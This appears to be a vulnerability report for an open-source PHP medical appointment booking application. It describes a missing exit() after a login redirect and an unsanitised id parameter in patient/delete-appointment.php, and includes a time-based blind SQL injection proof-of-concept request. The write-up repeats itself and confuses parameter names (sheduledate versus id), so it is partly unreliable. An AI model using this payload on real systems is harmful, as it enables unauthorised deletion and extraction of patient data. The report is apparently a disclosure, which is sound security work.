This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
patient/delete-appointment.php from line 3,the problem is at line 11 header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http
patient/delete-appointment.php from line 15,The $sheduledate parameter is controllable, the parameter sheduledate can be passed through post, and the $sheduledate is not protected from sql injection, line 21 $sql= $database->query("delete from appointment where appoid='$id';"); causes sql injection
if($_GET){
//import database
include("../connection.php");
$id=$_GET["id"];
//$result001= $database->query("select * from schedule where scheduleid=$id;");
//$email=($result001->fetch_assoc())["docemail"];
$sql= $database->query("delete from appointment where appoid='$id';");
//$sql= $database->query("delete from doctor where docemail='$email';");
//print_r($email);
header("location: appointment.php");
}
POC
GET /patient/delete-appointment.php?id=777'+(SELECT 0x5371724d WHERE 2432=2432 AND (SELECT 5389 FROM (SELECT(SLEEP(5)))WZWf))+ HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1
Vulnerability file address
patient/delete-appointment.php
from line 3,the problem is at line 11header("location: ../login.php");
,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header likeCookie: PHPSESSID=foo
is not passed in httppatient/delete-appointment.php
from line 15,The $sheduledate parameter is controllable, the parameter sheduledate can be passed through post, and the $sheduledate is not protected from sql injection, line 21$sql= $database->query("delete from appointment where appoid='$id';");
causes sql injectionPOC
Attack results pictures